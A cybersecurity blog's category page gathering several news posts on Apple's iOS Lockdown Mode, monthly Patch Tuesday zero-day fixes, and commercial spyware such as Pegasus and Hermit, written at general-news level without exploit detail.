Category: Lockdown Mode

Apple has introduced a powerful new data security feature, Lockdown Mode, for iPhone users running iOS 16 and later versions. This feature aims to provide heightened protection against cyber threats, particularly for individuals who are at a higher risk of being targeted by advanced attacks. While Lockdown Mode offers enhanced security, it does come with certain limitations that users should be aware of before enabling it.

What is Lockdown Mode?

Lockdown Mode is a security feature designed primarily for individuals who may be vulnerable to sophisticated cyberattacks, such as journalists, activists, or high-profile targets. It is intended to help protect users from spyware and other types of malicious activity. Although initially developed for a limited group of people, Apple has now made this feature available to all iOS users with devices running iOS 16 and above.

The feature limits certain device functionalities in exchange for heightened security. When enabled, Lockdown Mode restricts the use of certain apps, limits web browsing capabilities, and disables specific features in order to prevent the installation or exploitation of spyware like Pegasus, which is known for targeting high-risk individuals.

How to Enable Lockdown Mode?

Activating Lockdown Mode is straightforward. To do so, users should navigate to the Settings app on their iPhone. From there, they should select Privacy & Security, where the option to enable Lockdown Mode can be found. After selecting it, the iPhone will prompt the user to restart the device to activate the feature effectively. Once enabled, Lockdown Mode will function automatically, providing the added layer of protection.

What Does Lockdown Mode Disable?

While Lockdown Mode boosts security, it does so by limiting the functionality of certain apps and services. Here are some of the most notable effects of enabling Lockdown Mode:

Messaging Apps: Apps like WhatsApp will experience restrictions. Users will no longer be able to send or receive attachments such as photos, videos, documents, or links. Link previews are also disabled, meaning that when links are shared, the user will only see the raw URL instead of a preview of the content.

FaceTime: FaceTime calls will not function as they normally would, with some features being disabled or affected. For instance, it might not support video calls or could restrict other interactive elements of the service.

Web Browsing: Web browsing will be significantly impacted. When using Safari or other browsers, pages may load only in plain text, removing images, scripts, and other media that could potentially be used for malicious purposes. This could result in slower browsing experiences, with certain websites appearing incomplete or broken.

App and Website Functionality: In general, many apps and websites will experience a reduction in functionality. By limiting JavaScript and other active features, Lockdown Mode prevents harmful exploits from being executed via these platforms. This also protects against spyware that could otherwise compromise the device.

Emergency Features Remain Unaffected

One of the significant benefits of Lockdown Mode is that it does not interfere with critical emergency features. Functions like the Emergency SOS mode and Find My iPhone will continue to operate normally. These features are vital for user safety and are essential for situations where users need to access emergency help or locate their device.

Limitations on Location Sharing

Another side effect of Lockdown Mode is that location-sharing features may be restricted. While the Find My iPhone feature remains unaffected, the ability to share location information via apps like Messages or third-party apps may be limited or disabled entirely, depending on the specific app in question. This is another security measure to ensure that location data is not exploited by malicious actors.

Conclusion

In summary, Lockdown Mode is a valuable feature for iPhone users who are concerned about advanced cyber threats and spyware attacks. Although it may limit the functionality of some apps and services—such as messaging apps, FaceTime, and web browsing—the trade-off is the added security it provides against highly sophisticated malware. While it may not be suitable for everyday users due to the limitations it imposes, for those who need heightened protection, Lockdown Mode is an important tool to safeguard their personal data and privacy.

The post Here’s the little known iPhone data security secret, the Lockdown Mode appeared first on Cybersecurity Insiders.

Microsoft today issued software updates to fix at least five dozen security holes in Windows and supported software, including patches for two zero-day vulnerabilities that are already being exploited. Also, Adobe, Google Chrome and Apple iOS users may have their own zero-day patching to do.

On Sept. 7, researchers at Citizen Lab warned they were seeing active exploitation of a “zero-click,” zero-day flaw to install spyware on iOS devices without any interaction from the victim.

“The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim,” the researchers wrote.

According to Citizen Lab, the exploit uses malicious images sent via iMessage, an embedded component of Apple’s iOS that has been the source of previous zero-click flaws in iPhones and iPads.

Apple says the iOS flaw (CVE-2023-41064) does not seem to work against devices that have its ultra-paranoid “Lockdown Mode” enabled. This feature restricts non-essential iOS features to reduce the device’s overall attack surface, and it was designed for users concerned that they may be subject to targeted attacks. Citizen Lab says the bug it discovered was being exploited to install spyware made by the Israeli cyber surveillance company NSO Group.

This vulnerability is fixed in iOS 16.6.1 and iPadOS 16.6.1. To turn on Lockdown Mode in iOS 16, go to Settings, then Privacy and Security, then Lockdown Mode.

Not to be left out of the zero-day fun, Google acknowledged on Sept. 11 that an exploit for a heap overflow bug in Chrome is being exploited in the wild. Google says it is releasing updates to fix the flaw, and that restarting Chrome is the way to apply any pending updates. Interestingly, Google says this bug was reported by Apple and Citizen Lab.

On the Microsoft front, a zero-day in Microsoft Word is among the more concerning bugs fixed today. Tracked as CVE-2023-36761, it is flagged as an “information disclosure” vulnerability. But that description hardly grasps at the sensitivity of the information potentially exposed here.

Tom Bowyer, manager of product security at Automox, said exploiting this vulnerability could lead to the disclosure of Net-NTLMv2 hashes, which are used for authentication in Windows environments.

“If a malicious actor gains access to these hashes, they can potentially impersonate the user, gaining unauthorized access to sensitive data and systems,” Bowyer said, noting that CVE-2023-36761 can be exploited just by viewing a malicious document in the Windows preview pane. “They could also conduct pass-the-hash attacks, where the attacker uses the hashed version of a password to authenticate themselves without needing to decrypt it.”

The other Windows zero-day fixed this month is CVE-2023-36802. This is an “elevation of privilege” flaw in the “Microsoft Streaming Service Proxy,” which is built into Windows 10, 11 and Windows Server versions. Microsoft says an attacker who successfully exploits the bug can gain SYSTEM level privileges on a Windows computer.

Five of the flaws Microsoft fixed this month earned its “critical” rating, which the software giant reserves for vulnerabilities that can be exploited by malware or malcontents with little or no interaction by Windows users.

According to the SANS Internet Storm Center, the most serious critical bug in September’s Patch Tuesday is CVE-2023-38148, which is a weakness in the Internet Connection Sharing service on Windows. Microsoft says an unauthenticated attacker could leverage the flaw to install malware just sending a specially crafted data packet to a vulnerable Windows system.

Finally, Adobe has released critical security updates for its Adobe Reader and Acrobat software that also fixes a zero-day vulnerability (CVE-2023-26369). More details are at Adobe’s advisory.

For a more granular breakdown of the Windows updates pushed out today, check out Microsoft Patch Tuesday by Morphus Labs. In the meantime, consider backing up your data before updating Windows, and keep an eye on AskWoody.com for reports of any widespread problems with any of the updates released as part of September’s Patch Tuesday.

This month’s Patch Tuesday offers a little something for everyone, including security updates for a zero-day flaw in Microsoft Windows that is under active attack, and another Windows weakness experts say could be used to power a fast-spreading computer worm. Also, Apple has also quashed a pair of zero-day bugs affecting certain macOS and iOS users, and released iOS 16, which offers a new privacy and security feature called “Lockdown Mode.” And Adobe axed 63 vulnerabilities in a range of products.

Microsoft today released software patches to plug at least 64 security holes in Windows and related products. Worst in terms of outright scariness is CVE-2022-37969, which is a “privilege escalation” weakness in the Windows Common Log File System Driver that allows attackers to gain SYSTEM-level privileges on a vulnerable host. Microsoft says this flaw is already being exploited in the wild.

Kevin Breen, director of cyber threat research at Immersive Labs, said any vulnerability that is actively targeted by attackers in the wild must be put to the top of any patching list.

“Not to be fooled by its relatively low CVSS score of 7.8, privilege escalation vulnerabilities are often highly sought after by cyber attackers,” Breen said. “Once an attacker has managed to gain a foothold on a victim’s system, one of their first actions will be to gain a higher level of permissions, allowing the attacker to disable security applications and any device monitoring. There is no known workaround to date, so patching is the only effective mitigation.”

Satnam Narang at Tenable said CVE-2022-24521 — a similar vulnerability in the same Windows log file component — was patched earlier this year as part of Microsoft’s April Patch Tuesday release and was also exploited in the wild.

“CVE-2022-37969 was disclosed by several groups, though it’s unclear if CVE-2022-37969 is a patch-bypass for CVE-2022-24521 at this point,” Narang said.

Another vulnerability Microsoft patched this month — CVE-2022-35803 — also seems to be related to the same Windows log file component. While there are no indications CVE-2022-35803 is being actively exploited, Microsoft suggests that exploitation of this flaw is more likely than not.

Trend Micro’s Dustin Childs called attention to CVE-2022-34718, a remote code execution flaw in the Windows TCP/IP service that could allow an unauthenticated attacker to execute code with elevated privileges on affected systems without user interaction.

“That officially puts it into the ‘wormable’ category and earns it a CVSS rating of 9.8,” Childs said. “However, only systems with IPv6 enabled and IPSec configured are vulnerable. While good news for some, if you’re using IPv6 (as many are), you’re probably running IPSec as well. Definitely test and deploy this update quickly.”

Cisco Talos warns about four critical vulnerabilities fixed this month — CVE-2022-34721 and CVE-2022-34722 — which have severity scores of 9.8, though they are “less likely” to be exploited, according to Microsoft.

“These are remote code execution vulnerabilities in the Windows Internet Key Exchange protocol that could be triggered if an attacker sends a specially crafted IP packet,” wrote Jon Munshaw and Asheer Malhotra. “Two other critical vulnerabilities, CVE-2022-35805 and CVE-2022-34700 exist in on-premises instances of Microsoft Dynamics 365. An authenticated attacker could exploit these vulnerabilities to run a specially crafted trusted solution package and execute arbitrary SQL commands. The attacker could escalate their privileges further and execute commands as the database owner.”

Not to be outdone, Apple fixed at least two zero-day vulnerabilities when it released updates for iOS, iPadOS, macOS and Safari. CVE-2022-32984 is a problem in the deepest recesses of the operating system (the kernel). Apple pushed an emergency update for a related zero-day last month in CVE-2022-32983, which could be used to foist malware on iPhones, iPads and Macs that visited a booby-trapped website.

Also listed under active attack is CVE-2022-32817, which has been fixed on macOS 12.6 (Monterey), macOS 11.7 (Big Sur), iOS 15.7 and iPadOS 15.7, and iOS 16. The same vulnerability was fixed in Apple Watch in July 2022, and credits Xinru Chi of Japanese cybersecurity firm Pangu Lab.

“Interestingly, this CVE is also listed in the advisory for iOS 16, but it is not called out as being under active exploit for that flavor of the OS,” Trend Micro’s Childs noted. “Apple does state in its iOS 16 advisory that ‘Additional CVE entries to be added soon.’ It’s possible other bugs could also impact this version of the OS. Either way, it’s time to update your Apple devices.”

Apple’s iOS 16 includes two new security and privacy features — Lockdown Mode and Safety Check. Wired.com describes Safety Check as a feature for users who are at risk for, or currently experiencing, domestic abuse.

“The tool centralizes a number of controls in one place to make it easier for users to manage and revoke access to their location data and reset privacy-related permissions,” wrote Lily Hay Newman.

“Lockdown Mode, on the other hand, is meant for users who potentially face targeted spyware attacks and aggressive state-backed hacking. The feature comprehensively restricts any nonessential iOS features so there are as few potential points of entry to a device as possible. As more governments and repressive entities around the world have begun purchasing powerful commodity spyware to target individuals of particular importance or interest, iOS’s general security defenses haven’t been able to keep pace with these specialized threats.”

To turn on Lockdown Mode in iOS 16, go to Settings, then Privacy and Security, then Lockdown Mode. Safety Check is located in the same area.

Finally, Adobe released seven patches addressing 63 security holes in Adobe Experience Manager, Bridge, InDesign, Photoshop, InCopy, Animate, and Illustrator. More on those updates is here.

Don’t forget to back up your data and/or system before applying any security updates. If you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a decent chance other readers have experienced the same and may chime in here with useful tips.

Apple has announced a ‘Lockdown Mode’ in its upcoming iOS 16 and iPadOS 16 software and the feature is to protect its users against spyware like Pegasus and other malicious software

Aimed at journalists, activists, and politicians, the feature that will be activated by default will assist users in saving themselves from targeted cyber attacks.

Israel-based company developed spyware dubbed Pegasus a few years ago and said that the objective aimed behind the software development was to help governments and law enforcement agencies conduct espionage on intended targets that are termed as a threat to National Security.

However, the spying tool reached the hands of a Saudi Prince who somehow circulated the malicious surveillance software among public dignitaries like Amazon boss Jeff Bezos for reasons.

To counter such spyware in the future, Apple Inc has introduced a feature called ‘Lockdown Mode’ that blocks attachments, disables links in messages, emails, and other services, and blocks invitations and face time calls from little-known sources.

Showing its commitment to offering utmost security to its users, Apple announced the launch of the Rapid Security Response feature that automatically patches exploits as soon as they are rolled out. The feature will be available to Mac devices and will not need a reboot for the application.

Note 1- In the year 2021, the American technology giant that produces the prestigious iPhone filed a lawsuit in a Californian court against NSO Group based in Israel. The company sought permission to block Pegasus from invading its products and is also asking for compensation for the damage that took place so far.

Note 2- In May this year, Google’s Threat Analysis team discovered a new spyware tool invading the Android ecosystem of mobiles. The tool’s name is Hermit and was developed by RCS Lab in the year 2021. Its aim is to target the mobiles of celebrities and transmit data intelligence from their mobiles to remote servers. And the information that is being sent to Command and Control Servers includes contacts, photos, videos, messages, and e-wallet-related data.

Note 3- Apple is also offering a $2 million reward for those who can find meaningful flaws in its Lockdown Mode and also announced that it will add the money gained from the lawsuit against NSO to the $10 million grant that will help businesses that analyze, mitigate and prevent highly sophisticated cyber attacks.

 

The post Apple launches Lockdown Mode to protect its users against spyware appeared first on Cybersecurity Insiders.